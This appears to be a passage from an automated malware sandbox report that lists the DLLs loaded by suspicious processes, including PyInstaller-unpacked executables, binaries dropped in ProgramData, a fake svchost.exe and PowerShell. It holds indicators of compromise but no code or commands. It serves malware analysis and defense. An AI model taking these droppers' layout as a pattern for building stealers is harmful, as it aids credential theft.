                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: dxgidebug.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: dwmapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: riched20.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: usp10.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: msls31.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: windowscodecs.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: pcacli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI75642\Build.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: vcruntime140.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: version.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: python3.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: libffi-8.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: sqlite3.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: iphlpapi.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: libcrypto-3.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: libssl-3.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: mswsock.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: dnsapi.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: rasadhlp.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: fwpuclnt.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeSection loaded: version.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeSection loaded: vcruntime140.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeSection loaded: cryptsp.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: version.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: dxgidebug.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: sfc_os.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: sspicli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: rsaenh.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: uxtheme.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: dwmapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: cryptbase.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: riched20.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: usp10.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: msls31.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: kernel.appcore.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: dpapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: windowscodecs.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: textshaping.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: textinputframework.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: coreuicomponents.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: ntmarta.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: coremessaging.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: wintypes.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: windows.storage.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: wldp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: propsys.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: profapi.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: edputil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: urlmon.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: iertutil.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: srvcli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: netutils.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: appresolver.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: bcp47langs.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: slc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: userenv.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: sppc.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: apphelp.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: pcacli.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: mpr.dllJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI78002\s.exeSection loaded: msasn1.dllJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                  Source: C:\ProgramData\main.exeSection loaded: mscoree.dll
                                  Source: C:\ProgramData\main.exeSection loaded: apphelp.dll
                                  Source: C:\ProgramData\main.exeSection loaded: kernel.appcore.dll
                                  Source: C:\ProgramData\main.exeSection loaded: version.dll
                                  Source: C:\ProgramData\main.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\ProgramData\main.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\ProgramData\main.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\ProgramData\main.exeSection loaded: uxtheme.dll
                                  Source: C:\ProgramData\main.exeSection loaded: msasn1.dll
                                  Source: C:\ProgramData\main.exeSection loaded: windows.storage.dll
                                  Source: C:\ProgramData\main.exeSection loaded: wldp.dll
                                  Source: C:\ProgramData\main.exeSection loaded: profapi.dll
                                  Source: C:\ProgramData\main.exeSection loaded: cryptsp.dll
                                  Source: C:\ProgramData\main.exeSection loaded: rsaenh.dll
                                  Source: C:\ProgramData\main.exeSection loaded: cryptbase.dll
                                  Source: C:\ProgramData\main.exeSection loaded: rasapi32.dll
                                  Source: C:\ProgramData\main.exeSection loaded: rasman.dll
                                  Source: C:\ProgramData\main.exeSection loaded: rtutils.dll
                                  Source: C:\ProgramData\main.exeSection loaded: mswsock.dll
                                  Source: C:\ProgramData\main.exeSection loaded: winhttp.dll
                                  Source: C:\ProgramData\main.exeSection loaded: ondemandconnroutehelper.dll
                                  Source: C:\ProgramData\main.exeSection loaded: iphlpapi.dll
                                  Source: C:\ProgramData\main.exeSection loaded: dhcpcsvc6.dll
                                  Source: C:\ProgramData\main.exeSection loaded: dhcpcsvc.dll
                                  Source: C:\ProgramData\main.exeSection loaded: dnsapi.dll
                                  Source: C:\ProgramData\main.exeSection loaded: winnsi.dll
                                  Source: C:\ProgramData\main.exeSection loaded: rasadhlp.dll
                                  Source: C:\ProgramData\main.exeSection loaded: fwpuclnt.dll
                                  Source: C:\ProgramData\main.exeSection loaded: secur32.dll
                                  Source: C:\ProgramData\main.exeSection loaded: sspicli.dll
                                  Source: C:\ProgramData\main.exeSection loaded: schannel.dll
                                  Source: C:\ProgramData\main.exeSection loaded: mskeyprotect.dll
                                  Source: C:\ProgramData\main.exeSection loaded: ntasn1.dll
                                  Source: C:\ProgramData\main.exeSection loaded: ncrypt.dll
                                  Source: C:\ProgramData\main.exeSection loaded: ncryptsslp.dll
                                  Source: C:\ProgramData\main.exeSection loaded: gpapi.dll
                                  Source: C:\ProgramData\main.exeSection loaded: wbemcomn.dll
                                  Source: C:\ProgramData\main.exeSection loaded: amsi.dll
                                  Source: C:\ProgramData\main.exeSection loaded: userenv.dll
                                  Source: C:\ProgramData\main.exeSection loaded: ntmarta.dll
                                  Source: C:\ProgramData\main.exeSection loaded: propsys.dll
                                  Source: C:\ProgramData\main.exeSection loaded: edputil.dll
                                  Source: C:\ProgramData\main.exeSection loaded: urlmon.dll
                                  Source: C:\ProgramData\main.exeSection loaded: iertutil.dll
                                  Source: C:\ProgramData\main.exeSection loaded: srvcli.dll
                                  Source: C:\ProgramData\main.exeSection loaded: netutils.dll
                                  Source: C:\ProgramData\main.exeSection loaded: windows.staterepositoryps.dll
                                  Source: C:\ProgramData\main.exeSection loaded: wintypes.dll
                                  Source: C:\ProgramData\main.exeSection loaded: appresolver.dll
                                  Source: C:\ProgramData\main.exeSection loaded: bcp47langs.dll
                                  Source: C:\ProgramData\main.exeSection loaded: slc.dll
                                  Source: C:\ProgramData\main.exeSection loaded: sppc.dll
                                  Source: C:\ProgramData\main.exeSection loaded: onecorecommonproxystub.dll
                                  Source: C:\ProgramData\main.exeSection loaded: onecoreuapcommonproxystub.dll
                                  Source: C:\ProgramData\svchost.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                                  Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
